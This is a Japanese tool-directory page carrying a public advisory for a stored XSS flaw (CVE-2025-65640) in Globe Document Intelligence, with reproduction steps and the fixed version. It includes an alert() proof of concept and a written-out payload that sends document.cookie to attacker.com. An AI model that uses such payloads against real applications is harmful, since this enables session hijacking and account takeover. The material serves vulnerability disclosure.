Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-65640 — CVE-2025-65640 に関する公開アドバイザリ: Globe Document Intelligence の Stored XSS 脆弱性 | Kitploit
ツール/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト論文と研究学習と教育
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

CVE-2025-65640 に関する公開アドバイザリ: Globe Document Intelligence の Stored XSS 脆弱性

リポジトリを見る
1013ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-65640

1. 脆弱性情報

  • CVE ID: CVE-2025-65640 (現在 RESERVED)
  • 脆弱性タイプ: 格納型クロスサイトスクリプティング (XSS)
  • CVSSv3 スコア: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • ベンダー: Arket/Bluenext S.r.l.
  • 製品: Globe Document Intelligence
  • 影響を受けるバージョン: 5.0.0.559
  • 発見者: Vincenzo Emanuele Martone

2. 説明

Globe Document Intelligence プラットフォーム(バージョン 5.0.0.559)において、格納型クロスサイトスクリプティング (XSS) の脆弱性が確認されました。 このアプリケーションは、新しく作成されたドキュメントの「Title」プロパティ内でユーザーから提供された入力を適切にサニタイズまたはエンコードできません。 認証されたユーザーがサマリーページ(例:「Task in progress / Recent」)に移動すると、悪意のあるペイロードが反射され、被害者のブラウザのコンテキスト内で実行されます。

3. 影響

この脆弱性により、認証された攻撃者は悪意のある JavaScript コードをサーバーに保存できます。 他の認証ユーザー(管理者アカウントを含む)が影響を受けるページを表示すると、スクリプトが自動的に実行されます。 以下の概念実証では、無害な alert() を使用して脆弱性を示していますが、攻撃者はこの欠陥を悪用してセッションハイジャックやアカウント乗っ取りを達成することができます。 例えば、<script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> のようなペイロードを注入すると、被害者のセッションクッキーが攻撃者によって制御される外部サーバーにサイレントに流出します。

4. 再現手順 (概念実証)

脆弱性を再現するには、認証された攻撃者は以下の手順を実行できます。

  1. ドキュメント作成セクション(「Nuovo documento」)に移動し、必須フィールドに任意のデータを入力して新しいドキュメントを正常に作成します。
  • フォームを送信し、ドキュメントを作成します。
  • 新しく作成したドキュメントを選択し、コンテキストメニューを開き(右クリック → Document Properties)、「Title」フィールドを見つけます。
  • 以下の基本的な XSS ペイロードを「Title」フィールドに注入します:<script>alert("XSS")</script>
  • 変更を保存します。悪意のあるペイロードはデータベースに永続的に保存されます。
  • 「Task in attesa/Recenti」(Task in progress / Recent)ページに移動します。
  • ページがドキュメントタイトルを適切な出力エンコードなしでレンダリングするため、JavaScript ペイロードが実行され、アラートがトリガーされます。
  • 5. 推奨される対策

    ベンダーによると、この脆弱性はバージョン 5.1.0.575 で対処されています。 この問題を解決するには、Globe Document Intelligence プラットフォームをバージョン 5.1.0.575 に更新することを推奨します。


    免責事項

    この概念実証 (PoC) は、教育および研究目的でのみ提供されています。 本書に記載された情報およびコードは、システム所有者からの明示的な事前許可なく、悪意のある活動やシステムに対して使用してはなりません。著者は一切の責任を負わず、提供された資料の適用によって生じた誤用または損害について責任を負いません。

    ツールをダウンロード